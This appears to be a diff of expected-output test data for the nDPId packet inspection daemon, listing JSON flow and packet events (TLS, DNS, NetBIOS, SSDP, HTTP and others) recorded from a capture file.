00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1273,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":3,"flow_last_seen":1470104423247,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104423247,"pkt":"ABAj4ACgYMVHBbyMCABFAAAoVNRAAEAG7E\/AqAUQwKhzS9F9AbtloPkmgtA7TFAQIACmCwAAUC8xLjEN"}
00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1274,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104423246,"flow_last_seen":1470104423248,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1470104423248,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53629,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"618ee2509ef52bf0b8216e1564eea909","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01097{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1276,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104423246,"flow_last_seen":1470104423251,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":374,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1470104423251,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53629,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"618ee2509ef52bf0b8216e1564eea909","ja3s":"573a9f3f80037fb40d481e2054def5bb","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1271,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104423246,"flow_last_seen":1470104423246,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104423246,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53629,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1271,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":1,"flow_last_seen":1470104423246,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1470104423246,"pkt":"ABAj4ACgYMVHBbyMCABFAABAVdFAAEAG6zrAqAUQwKhzS9F9AbtloPklAAAAALAC\/\/81IwAAAgQFtAEDAwUBAQgKGg+8HwAAAAAEAgAA"}
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1272,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":2,"flow_last_seen":1470104423247,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104423247,"pkt":"ABxCjnAxABAj4ACgCABFAAA0AABAAEAGQRjAqHNLwKgFEAG70X2C0DtLZaD5JoASFtBuaQAAAgQFtAEBBAIBAwMH"}
00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1273,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":3,"flow_last_seen":1470104423247,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104423247,"pkt":"ABAj4ACgYMVHBbyMCABFAAAoVNRAAEAG7E\/AqAUQwKhzS9F9AbtloPkmgtA7TFAQIACmCwAAUC8xLjEN"}
00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1274,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104423246,"flow_last_seen":1470104423248,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1470104423248,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53629,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"618ee2509ef52bf0b8216e1564eea909","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01097{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1276,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104423246,"flow_last_seen":1470104423251,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":374,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1470104423251,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53629,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"618ee2509ef52bf0b8216e1564eea909","ja3s":"573a9f3f80037fb40d481e2054def5bb","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1318,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104424738,"flow_last_seen":1470104424738,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1470104424738,"l3_proto":"ip4","src_ip":"192.168.0.104","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1318,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":1,"flow_last_seen":1470104424738,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1470104424738,"pkt":"\/\/\/\/\/\/\/\/AAwpjO\/4CABFAABOZ6MAAIARUUPAqABowKj\/\/wCJAIkAOgIy8PkBEAABAAAAAAAAIEZERURDT0VCRkNGQ0VCRU9FREVCRkNDT0VQRkNFSEFBAAAgAAE="}
00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1318,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104424738,"flow_last_seen":1470104424738,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1470104424738,"l3_proto":"ip4","src_ip":"192.168.0.104","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1325,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":2,"flow_last_seen":1470104425455,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1470104425455,"pkt":"\/\/\/\/\/\/\/\/AAwpjO\/4CABFAABOZ6QAAIARUULAqABowKj\/\/wCJAIkAOgIy8PkBEAABAAAAAAAAIEZERURDT0VCRkNGQ0VCRU9FREVCRkNDT0VQRkNFSEFBAAAgAAE="}
00878{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1329,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":2,"flow_last_seen":1470104425762,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":359,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":359,"pkt_l4_len":325,"thread_ts_msec":1470104425762,"pkt":"\/\/\/\/\/\/\/\/wKC7c+snCABFAAFZOwBAAEARM+XAqAoH\/\/\/\/\/\/YA9gABRUMe\/\/+fLaAAwKC7c+snwKgKBwAAAgAnAURHUy0xMjEwLTEwUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABTd2l0Y2gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADMuMTAuMDEzAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwKC7c+snQjEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABRUDBSMUQ5MDAwMDIzAAAAAAAAAAAAAAAAAAAAAAAAAERHUy0xMjEwLTEwUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAqAoH\/\/8AAFBvcnQgOAAAAAAAAAAAAAAAAAAAAAAAAAA="}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1330,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":1470104425786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104425786,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0xkFAAEAGbFvAqAUQROn9hdFtAFBAFGHVDj7nf4AREAFpCQAAAQEIChoPxgTPHNz0"}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1330,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":1470104425786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104425786,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0xkFAAEAGbFvAqAUQROn9hdFtAFBAFGHVDj7nf4AREAFpCQAAAQEIChoPxgTPHNz0"}
00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1336,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":3,"flow_last_seen":1470104426276,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1470104426276,"pkt":"\/\/\/\/\/\/\/\/AAwpjO\/4CABFAABOZ6UAAIARUUHAqABowKj\/\/wCJAIkAOgIy8PkBEAABAAAAAAAAIEZERURDT0VCRkNGQ0VCRU9FREVCRkNDT0VQRkNFSEFBAAAgAAE="}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1343,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104426973,"flow_last_seen":1470104426973,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1470104426973,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"17.253.26.125","src_port":123,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1343,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":1,"flow_last_seen":1470104426973,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1470104426973,"pkt":"TF4M6gNlYMVHBbyMCABFwABMyLEAAEARvv3AqAUQEf0afQB7AHsAOHvnIwIG7AAAJiAAAPbJEf0afdtKfo89Puc520qBhKZDx2jbSoGEtCSHfttKgew\/d58s"}
@@ -546,8 +546,8 @@
00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104414395,"flow_last_seen":1470104414402,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"168.95.1.1","src_port":63372,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1470104376017,"flow_last_seen":1470104433238,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1064,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"239.255.255.250","src_port":55312,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104430884,"flow_last_seen":1470104431294,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::e034:7be:d8f9:6197","dst_ip":"ff02::1:3","src_port":49766,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104414404,"flow_last_seen":1470104414420,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8554,"flow_avg_l4_payload_len":611,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53627,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104414404,"flow_last_seen":1470104414419,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8214,"flow_avg_l4_payload_len":586,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53628,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104414404,"flow_last_seen":1470104414420,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8554,"flow_avg_l4_payload_len":611,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53627,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104414404,"flow_last_seen":1470104414419,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8214,"flow_avg_l4_payload_len":586,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53628,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1470104377734,"flow_last_seen":1470104377753,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":51024,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Streaming"}}
00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104398932,"flow_last_seen":1470104433649,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.2.186","dst_ip":"255.255.255.255","src_port":32768,"dst_port":1947,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104398932,"flow_last_seen":1470104433649,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.2.186","dst_ip":"255.255.255.255","src_port":32768,"dst_port":1947,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -555,14 +555,14 @@
00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104426992,"flow_last_seen":1470104427094,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::4568:efbc:40b1:1346","dst_ip":"ff02::1:3","src_port":57148,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1470104376301,"flow_last_seen":1470104422690,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}}
00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104391254,"flow_last_seen":1470104391362,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":51714,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1470104380773,"flow_last_seen":1470104381859,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":445,"flow_tot_l4_payload_len":3534,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.205.151.234","src_port":49608,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"}}
00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1470104380773,"flow_last_seen":1470104381859,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":445,"flow_tot_l4_payload_len":3534,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.205.151.234","src_port":49608,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"}}
00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1470104382242,"flow_last_seen":1470104432114,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1596,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"239.255.255.250","src_port":55484,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1470104382241,"flow_last_seen":1470104432114,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1330,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"239.255.255.250","src_port":55485,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1470104373232,"flow_last_seen":1470104432419,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1729,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"239.255.255.250","src_port":51389,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1470104419061,"flow_last_seen":1470104419317,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1833,"flow_avg_l4_payload_len":183,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"31.13.87.1","dst_ip":"192.168.5.16","src_port":443,"dst_port":53578,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1470104419061,"flow_last_seen":1470104419317,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1833,"flow_avg_l4_payload_len":183,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"31.13.87.1","dst_ip":"192.168.5.16","src_port":443,"dst_port":53578,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1470104414296,"flow_last_seen":1470104414478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":3753,"flow_avg_l4_payload_len":417,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"31.13.87.36","src_port":53580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
